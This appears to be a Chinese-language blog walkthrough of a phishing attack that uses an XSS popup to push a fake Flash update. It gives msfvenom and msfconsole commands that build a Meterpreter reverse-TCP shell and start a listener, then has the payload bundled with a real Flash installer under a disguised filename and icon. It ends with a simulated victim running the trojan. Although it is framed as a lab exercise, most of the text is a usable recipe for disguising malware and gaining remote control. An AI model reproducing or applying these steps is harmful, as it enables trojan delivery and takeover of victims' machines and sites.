第一步:本机已经开启phpstudy的web服务
第二步:下载Flash项目源码文件,并部署在网站根目录下,访问
项目地址:https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash
第三步:来到xssaq平台,点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成js文件放到我们网站的根目录下面
第四步:修改1.js中的代码,改成伪造的flash网站网址
第五步:打开kali,生成监听文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run
第六步:将生成的文件和Flash安装包用WinRAR一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",并做如图配置后,点击确定
第七步:使用ResourceHacker修改图标,进一步伪装
下载地址:Resource Hacker下载_Resource Hacker官方免费下载_2024最新版_华军软件园
第八步:模拟受害者的流程
输入以下代码,点击提交
登陆后台管理系统,输入admin,123456登陆,
跳转到以下页面,点击立即升级
点击下载后,运行安装程序,此时木马已被执行
第九步:获取到受害者网站控制权
标签:xss,exe,网站,控制权,flash,点击,set,下载 From: https://blog.csdn.net/m0_59151303/article/details/140645940